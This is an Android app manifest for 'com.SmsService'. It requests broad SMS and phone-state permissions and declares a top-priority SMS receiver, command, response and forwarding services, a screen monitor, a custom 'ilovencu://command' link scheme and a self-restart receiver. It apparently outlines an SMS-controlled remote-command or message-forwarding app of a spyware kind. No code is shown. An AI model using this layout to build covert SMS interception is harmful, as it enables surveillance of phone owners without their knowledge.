<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
      package="com.SmsService"
      android:versionCode="1"
      android:versionName="1.0">
    <uses-sdk android:minSdkVersion="8" />
    <uses-permission android:name="android.permission.SEND_SMS"></uses-permission>
    <uses-permission android:name="android.permission.RECEIVE_SMS"></uses-permission>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"></uses-permission>
    <uses-permission android:name="android.permission.READ_SMS"></uses-permission>
    <uses-permission android:name="android.permission.WRITE_SMS"></uses-permission>    
    <uses-permission android:name="android.permission.MODIFY_PHONE_STATE"></uses-permission>
   
    

    <application 
    		android:icon="@drawable/icon" 
    		android:label="@string/app_name">
    		
    		<activity android:name=".ReceiverComponent.NetCommand"
                  android:label="@string/NetCommand">
            	<intent-filter>
                	<action android:name="android.intent.action.VIEW" />
                	<category android:name="android.intent.category.DEFAULT" />
                	<category android:name="android.intent.category.BROWSABLE"/>
                	<data android:scheme="ilovencu" android:host="command"/>             
            	</intent-filter>
            </activity>
    		
            <service 
                android:name=".CommandComponent.CommandService"
                android:label="@string/CommandService">
                <intent-filter>
                        <action android:name="android.intent.action.MAIN"/>
                        <category android:name="android.intent.category.LAUNCHER" />
                </intent-filter>
            </service>            
            
            <service 
                android:name=".ReceiverComponent.ScreenMonitor"
                android:label="@string/ScreenMonitor">
                <intent-filter>
                        <action android:name="android.intent.action.MAIN"/>
                        <category android:name="android.intent.category.LAUNCHER" />
                </intent-filter>
            </service>
            
            <service 
                android:name=".CommandComponent.ResponseService"
                android:label="@string/ResponseService">
                <intent-filter>
                        <action android:name="android.intent.action.MAIN"/>
                        <category android:name="android.intent.category.LAUNCHER" />
                </intent-filter>
            </service>
         
            <service 
                android:name=".CommandComponent.FowardService"
                android:label="@string/FowardService">
                <intent-filter>
                        <action android:name="android.intent.action.MAIN"/>
                        <category android:name="android.intent.category.LAUNCHER" />
                </intent-filter>
            </service>
            
        	
        	<receiver android:name=".ReceiverComponent.SmsReceiver"> 
            	<intent-filter android:priority="1000">            	 
                	<action android:name="android.provider.Telephony.SMS_RECEIVED"/> 
            	</intent-filter> 
        	</receiver>
        	
        	<receiver android:name=".AuxiliaryComponent.CommandRestartReceiver"> 
            	<intent-filter>            	 
                	<action android:name="CommandService.stillJob"/> 
            	</intent-filter> 
        	</receiver>
        	
        	     	
        	
        	
    </application>


    
</manifest>